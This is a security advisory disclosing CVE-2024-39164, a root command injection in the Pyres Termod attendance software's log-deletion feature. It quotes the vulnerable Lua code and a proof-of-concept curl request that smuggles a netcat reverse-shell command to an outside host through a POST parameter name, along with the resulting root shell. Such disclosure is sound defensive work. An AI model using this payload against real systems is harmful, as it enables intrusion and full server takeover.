Remote Code Execution on Pyres Termod before 10.04w

17/07/2024 - Download

Product

Pyres Termod

Severity

Critical

Fixed Version(s)

10.04w

Affected Version(s)

10.04c to 10.04w

CVE Number

CVE-2024-39164

Authors

Pierre Martin

Jacques Monin

Rémi Matasse

Description

Presentation

Pyres Termod allows user guidance in identifying and recording working time and attendance, data consultation and entry (missions, vacations, events, etc.), enhanced interactivity through interfacing capabilities in phase with projects (CLOUD/SAAS, ORACLE, etc.).

Issue(s)

The web interface for administration of badges is preconfigured with default credentials. This could allow a malicious administrator to gain remote code execution on the server hosting the Pyres Termod application.

Timeline

Date Description
2023.10.27 Advisory sent to direct@pyres.com
2023.11.08 Pyres answers that the vulnerability has been fixed at least since 10.04w
2024.07.03 CVE-2024-39164 assigned
2024.07.17 Public release

 

Technical details

Description

The following feature allows deleting application logs:

 

[...]
print ("<h1>"..title.."</h1>")
tablePost= getpost()

--TRAITEMENT POST
if (tablePost!="") then
    for k,v in pairs(tablePost) do
        if (k!="Supprimer") then
            pos = string.find(k, "updatelog---")
            local logFile;
        if pos== nil then
            logFile = "/mnt/sram/log/"..k
        else
            logFile = "/usr/local/updatelog/"..string.sub(k, 13)
        end
        os.execute("/bin/rm \""..logFile.."\"") 
    end
end
[...]

The function iterates over POST parameter keys and values, and constructs the logFile variable with them before calling os.execute() without sanitizing the file name.

Command injection can be achieved with the following curl command:

curl -X POST -H 'Cookie: ***' 'http://127.0.0.1/maint/index.lua?page=maintlogs' --data '`nc 10.10.10.10 80 -e /bin/sh`=a&Supprimer=Supprimer'

By running it, a reverse shell is received on the remote server:

$ nc -lnvp 80
Connection received on 10.10.10.10
id
uid=0(root) gid=0(root)

 

Impact

This vulnerability can be used to execute arbitrary commands on the affected server, as root. This could allow attackers to get a privileged access on a vulnerable instance of Pyres Termod.